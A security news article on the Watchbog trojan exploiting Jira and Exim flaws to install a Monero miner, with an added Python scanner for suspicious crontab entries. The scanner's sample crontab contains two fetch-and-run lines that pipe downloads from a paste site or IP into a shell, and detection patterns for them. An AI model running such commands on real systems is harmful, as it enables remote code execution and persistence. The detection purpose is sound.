Watchbog Exploits Jira and Exim Vulnerabilities to Infect Linux Servers With Cryptocurrency Miner

Threat actors are targeting Linux servers with vulnerable software, namely the software development and project management tool Jira and the message transfer agent Exim, using a variant of the Watchbog trojan (detected by Trend Micro as Backdoor.Linux.EMEXIE.A and Backdoor.Linux.EMEXIE.B), which drops a Monero miner to expand their botnet operations.  

Bleeping Computer, which has been tracking Watchbog’s recent activities, noted that the malware was infecting Linux servers earlier in the year by exploiting vulnerabilities in other software such as Jenkins and Nexus Repository Manager 3.


New variant spotted

A more recent variant, found by security researcher polarpy, abuses two vulnerabilities. The first is CVE-2019-11581, a server-side template injection vulnerability in Jira Server and Data Center that could allow an attacker to execute code remotely (it has since been patched). The second is another remote code execution flaw, this time in Exim: CVE-2019-10149 (like CVE-2019-11581, this vulnerability has also been addressed).

If Watchbog is successful with its infection routine, it will download and execute commands from a Pastebin C&C server to deploy a Monero cryptocurrency miner on the infected machine. It will then add itself to multiple crontab files for persistence.
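The crontab persistence described above leaves evidence an administrator can check for. The following is an added example, not code from the original article or from Trend Micro; the sample crontab, the two heuristics and the function names are constructed assumptions, not Watchbog indicators. It parses cron entries and flags those that reference a paste site or pipe a download into an interpreter:

```python
import re
import sys

FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_INTERP = re.compile(r"(?<!\|)\|(?!\|)\s*((ba|da|z)?sh|python[0-9.]*|perl)\b")
PASTE_HOST = re.compile(r"\bpastebin\.com\b", re.I)
ENV_LINE = re.compile(r"^[A-Za-z_]\w*\s*=")
# Five schedule fields or an @shorthand; system crontabs keep the user name in "rest".
SCHEDULE = re.compile(r"^(@\w+|(\S+\s+){4}\S+)\s+(?P<rest>.+)$")

# Constructed sample crontab, not taken from a real infection.
SAMPLE = """\
# m h dom mon dow user command
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/11 * * * * root curl -fsSL https://pastebin.com/raw/EXAMPLE | sh
@reboot wget -q -O- http://203.0.113.5/setup | bash
0 3 * * * backup /usr/local/bin/backup.sh https://example.org/upload
"""

def cron_command(line):
    """Text after the schedule, or None for blanks, comments and VAR=value lines."""
    s = line.strip()
    if not s or s.startswith("#") or ENV_LINE.match(s):
        return None
    m = SCHEDULE.match(s)
    return m.group("rest") if m else None

def scan_text(source, text):
    """Return (source, line number, reasons, command) for each suspicious entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = cron_command(line)
        if cmd is None:
            continue
        reasons = []
        if PASTE_HOST.search(cmd):
            reasons.append("paste-site URL")
        if FETCH.search(cmd) and PIPE_TO_INTERP.search(cmd):
            reasons.append("download piped to interpreter")
        if reasons:
            findings.append((source, n, reasons, cmd))
    return findings

if __name__ == "__main__":
    # Pass cron files to check, e.g. /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*
    for path in sys.argv[1:]:
        with open(path, errors="replace") as fh:
            for hit in scan_text(path, fh.read()):
                print(hit)
```

Matches are leads for review rather than verdicts, since legitimate installers sometimes schedule the same download-and-run pattern.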

Alleged good intentions

One interesting detail about this Watchbog variant is that its coin miner script includes a note that mentions the attackers’ alleged good intentions: keeping the internet safe by exposing compromised machines that have exploitable vulnerabilities. The note also mentions that the perpetrators’ only goal is to mine — with no intention of abusing the stored data within infected servers.

Highlighting the importance of patching

While the threat actors’ note doesn’t excuse the act of performing cryptocurrency mining without the owner’s approval, it does highlight an important point: Patching should always be a priority for organizations, especially when the systems and software they use are dealing with critical vulnerabilities. In this case, both of the vulnerabilities exploited by Watchbog are already patched — leaving IT administrators with little excuse not to update their machines.

Given the popularity of software like Jira in DevOps environments, organizations can strengthen their overall security by using technology such as Trend Micro DevOps security solutions that bake security into the development process, allowing them to make development cycles more efficient and reduce human touch points and errors.  

Another security technology enterprises can consider is the Trend Micro™ Deep Discovery™ solution, which provides detection, in-depth analysis, and proactive response to attacks that use exploits through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update.

It also includes the Trend Micro Deep Discovery Inspector, which protects customers from the specific Watchbog attack in this article via these DDI rules:


  • DDI Rule 2945: CVE-2019-10149 Exim Remote Code Execution Exploit - SMTP (Request)
  • DDI Rule 4101: CVE-2019-10149 Exim Remote Code Execution Exploit - SMTP (Request) - Variant 2
  • DDI Rule 4162: CVE-2019-11581 Atlassian JIRA Template Injection - HTTP (Request)
